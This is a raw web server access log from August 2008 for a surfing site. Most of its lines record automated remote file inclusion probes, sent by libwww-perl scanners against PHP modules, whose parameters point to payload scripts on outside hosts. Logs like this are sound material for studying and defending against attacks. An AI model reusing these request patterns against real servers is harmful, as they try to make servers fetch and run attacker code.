72.9.233.10 - - [31/Aug/2008:21:43:06 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:06 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:54 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:57 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:57 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:44:20 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:44:20 -0700] "GET //ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:44:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:44:41 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:44:41 -0700] "GET //?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:44:41 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.805" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:46:00 -0700] "GET /logs/access_080707.log//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:46:00 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:21:46:00 -0700] "GET //ashnews.php?pathtoashnews=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:04 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:05 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:05 -0700] "GET /logs/access.log//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:06 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:06 -0700] "GET //include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:46:09 -0700] "GET /logs//include/write.php?dir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:47:05 -0700] "GET /logs/access_080707.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:47:05 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:47:05 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
66.249.66.73 - - [31/Aug/2008:21:49:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.tribalsurf.com"
66.249.66.73 - - [31/Aug/2008:21:49:14 -0700] "GET /surfmovietonite.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:21:50:31 -0700] "GET /logs/access.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:21:50:31 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
87.101.4.49 - - [31/Aug/2008:21:50:31 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:21:51:11 -0700] "GET /logs/access_080707.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:21:51:12 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:21:51:14 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:52:24 -0700] "GET /logs/access_080714.log/phphtml.php?htmlclass_path=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
74.6.18.244 - - [31/Aug/2008:21:52:38 -0700] "GET /swap/?M=D HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:54:35 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:54:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:54:36 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
74.53.231.2 - - [31/Aug/2008:21:55:12 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
74.53.231.2 - - [31/Aug/2008:21:55:12 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:10 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:56:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:57:32 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:57:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:57:32 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:17 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:58 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:58:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
203.199.149.72 - - [31/Aug/2008:21:59:08 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:11 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:17 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:59:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:01:07 -0700] "GET /logs/access.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:01:08 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:01:08 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:22:02:27 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:22:02:27 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:22:02:27 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:38 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:39 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:43 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:43 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:43 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:43 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:44 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:02:44 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:26 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:26 -0700] "GET ///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:27 -0700] "GET /logs///vwar/backup/errors.php?error=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:38 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:38 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:53 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:03:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:05:29 -0700] "GET /logs/access.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:05:30 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "tribalsurf.com"
89.186.1.54 - - [31/Aug/2008:22:05:30 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:05:38 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:05:39 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:05:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:07:42 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:07:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:07:55 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:07:56 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:08:02 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:08:24 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:08:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:08:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:09:43 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:09:44 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:22:09:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
77.221.130.3 - - [31/Aug/2008:22:10:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://websnap.ru//wp-content/uploads/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:22:11:51 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
151.11.24.250 - - [31/Aug/2008:22:11:51 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
